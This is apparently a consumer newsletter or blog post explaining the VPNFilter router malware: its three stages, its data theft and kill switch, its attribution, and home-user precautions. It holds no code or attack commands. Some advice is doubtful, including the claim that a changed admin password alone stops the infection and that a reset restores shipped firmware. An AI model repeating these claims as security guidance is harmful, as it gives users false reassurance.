VPNFilter: The Russians Really Are Coming For Your Data

A deadly serious threat is on the loose: a virus called VPNFilter that infects business and consumer-grade routers to steal passwords and other sensitive data from any device on a network served by an infected router. Here’s what you need to know now…

What is VPNFilter Malware?

In addition to stealing passwords, VPNFilter also degrades (decrypts) secure HTTPS connections to steal data from them and pass along new infections to the HTTPS connections’ destinations. Part of VPNFilter can survive a router reboot and then download other malware modules. It even has a “kill switch” that can destroy the firmware of its host router.

Already, VPNFilter has infected an estimated 500,000 to 1,000,000 routers worldwide, according to Cisco Systems’ Talos Intelligence threat research division.

The FBI attributes VPNFilter to the “Fancy Bear” Russian hacker group, which is implicated in the 2016 hack of the U.S. Democratic National Committee’s network and other political and industrial espionage campaigns. Political news site, The Daily Beast, reported on May 23rd that the FBI seized a key server used by the VPNFilter botnet. But that hardly slowed the havoc being wrought by VPNfilter because of the diabolically ingenious way it is designed.

VPNFilter consists of three modules or stages. The first module is a worm, a virus that rapidly slithers from one router to another, infecting each and replicating itself for further infections. Stage One also writes itself into a list of tasks that are performed by vulnerable routers each time they are rebooted, thereby ensuring that it will survive a reboot. Stage One’s next function is to facilitate other modules’ infection of the host router.

Stage Two is downloaded by Stage One if the former is not already present. Stage Two contains the “routine” spying functions that VPNFilter performs on each device connected to an infected router. It sniffs out passwords and other account credentials, contact lists, calendars with birthdays and other sensitive personal info. Stage Two can also execute any special instructions given to it by optional Stage Three modules, which may also be downloaded by Stage One.

Many Stage Three modules have been discovered since Talos Intelligence started tracking VPNFilter in 2016. For most of that time, it appeared that VPNFilter targeted relatively few but critically important industrial control systems. The infection of consumer routers was thought to be recruitment for a botnet whose primary target was the control systems.

Plenty of Fish

But recent modules show that VPNFilter’s masters are after many more and smaller prey, including your little home network.

One new module can alter incoming data before it’s displayed to users; for example, it can make your bank account balance look normal when in reality the account is being drained dry. Others can steal PGP encryption keys, SSL certificates, and other authentication credentials. Still others can inject malicious payloads into streams of outgoing data to spread VPNFilter and its custom payloads to destination devices.

Libraries of Stage Three modules are scattered all over the Internet. A clever clue to the IP addresses of such libraries was found hidden in the metadata of image files stored on Photobucket. When that resource was removed, Stage One moved on to backup sources.

If Stage One cannot find a library of Stage Three Modules it can go into “listening mode,” passively awaiting new instructions from its human masters. Those instructions may include the locations of libraries, or malicious payloads themselves, or a “kill switch” instruction that causes Stage One to erase itself and the entire file system of its host, effectively turning the router into a brick.

Who Is Vulnerable?

Only routers that run specific Linux-based firmware are vulnerable to VPNFilter. The bad news is that a lot of manufacturers use such firmware on many consumer-grade routers. Note that this vulnerability has nothing to do with the operating system on your computer. It’s the code running inside your router that’s at issue here.

I was going to include a list of vulnerable devices from vendors including Asus, D-Link, Huawei, Linksys, Mikrotik, Netgear, QNAP, TP-Link, Ubiquiti, Upvel, and ZTE, but there are over 100 known so far, and the list is growing. At this point, it seems better to assume that your router is on the list of vulnerable devices.

There’s one important caveat, though. VPNFilter is lazy, so it only tries to break into routers that have the default (factory-supplied) login credentials. If you are certain that you’ve secured your router with a password of your own choosing, then VPNFilter will move on to other targets.

I want to remind readers that your WiFi password (the one you use to connect your computer, tablet or phone to your router) is not the same as your router’s admin password. They are distinct; the router password is used to login to the router’s setup screens, where one can configure wifi passwords, and other settings.

What To Do About VPNFilter

Some security experts recommend that all router owners, not just owners of routers on this list, perform a factory reset on their routers. A reset restores a router’s firmware to the version that was shipped with it; so VPNFilter wlll be erased for certain, if it was present.

Most routers have a RESET button on the device. Depressing that button for 10 (or sometimes 30) seconds will reset the router’s login credentials, but may or may not affect the firmware. Because there are so many different router vendors and models, I recommend that you search online for instructions on how to reset your router’s firmware, if you decide to do so.

Next, change that default admin password! The Stage One worm works at lightning speed. It knocks on a router’s door just once, with the default password. If the worm gets no answer, it is vanquished. VPNFilter has gotten as far as it has by relying on the laziness of consumers and of professional IT workers who should know better. Change the router’s password, dang it! If you don’t know how to do that search online, or ask your Internet provider for help.

If your router is more than 4-5 years old, consider replacing it rather than resetting its firmware. The value of an antique router is negligible, a new one can be had for less than $50, and you will have peace of mind knowing that it’s factory-fresh. Your internet provider may even swap out your old router for a new one upon request.

Bottom line: VPNFilter is powerfully malicious; highly resilient; and spreading like wildfire. This is not a drill. Take all the precautions you can.

Have a Great Week From all of us on the ZI Staff.